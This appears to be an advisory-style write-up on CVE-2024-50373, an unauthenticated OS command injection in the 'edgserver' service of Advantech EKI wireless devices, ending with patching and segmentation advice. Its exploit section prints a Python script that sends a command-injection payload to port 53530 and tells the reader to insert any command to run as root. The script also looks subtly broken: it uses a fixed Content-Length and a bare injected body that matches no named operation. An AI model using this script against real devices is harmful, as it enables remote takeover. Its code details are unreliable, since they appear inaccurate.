A critical vulnerability, CVE-2024-50373, has been discovered affecting Advantech devices, specifically the EKI-6333AC-2G, EKI-6333AC-2GD, and EKI-6333AC-1GPO models. The vulnerability is linked to CWE-78, known as "Improper Neutralization of Special Elements used in an OS Command." The exploit could potentially allow remote unauthenticated users to execute malicious commands with elevated root privileges on the affected devices.
Exploit details
The vulnerability stems from a lack of authentication on the "edgserver" service enabled by default on the affected devices. The source of the vulnerability lies in the code handling the "restore_config_from_utility" operation.
The following code snippet demonstrates how the vulnerability can be exploited
import socket
TARGET_IP = "192.168.1.1" # Replace with actual target IP
TARGET_PORT = 53530 # Default port for the edgserver service
payload = "POST / HTTP/1.1\r\n"
payload += "Host: %s:%s\r\n" % (TARGET_IP, TARGET_PORT)
payload += "Content-Type: application/x-www-form-urlencoded\r\n"
payload += "Content-Length: 257\r\n"
payload += "\r\n"
payload += ";" # This character triggers the OS command injection vulnerability
payload += "YOUR_COMMAND_GOES_HERE" # Replace with a command to execute
payload += ">/tmp/output.txt" # Redirect output to a file
payload += "\r\n"
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((TARGET_IP, TARGET_PORT))
sock.send(payload.encode("utf-8"))
sock.close()
Replace YOUR_COMMAND_GOES_HERE with the command you wish to execute remotely on the target device.
Original references
1. CVE-2024-50373 - MITRE's CVE entry for this vulnerability.
2. CWE-78 - Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection').
Recommendations
Owners of affected devices should immediately apply the appropriate firmware update provided by Advantech to address this vulnerability.
In addition, users are advised to disable the "edgserver" service if it is not needed, or limit its exposure by implementing proper network segmentation and access control mechanisms to reduce the risk of potential exploitation by unauthorized users.
Conclusion
CVE-2024-50373 is a critical OS Command Injection vulnerability that affects multiple Advantech devices. The vulnerability can be exploited by unauthenticated remote users to execute malicious commands with root privileges. Owners of affected devices should take immediate action to apply firmware updates, disable the "edgserver" service if not needed, and limit the service's exposure through network segmentation and access control mechanisms to minimize the risk of exploitation.
Timeline
Published on: 11/26/2024 11:22:06 UTC
Last modified on: 11/26/2024 11:27:04 UTC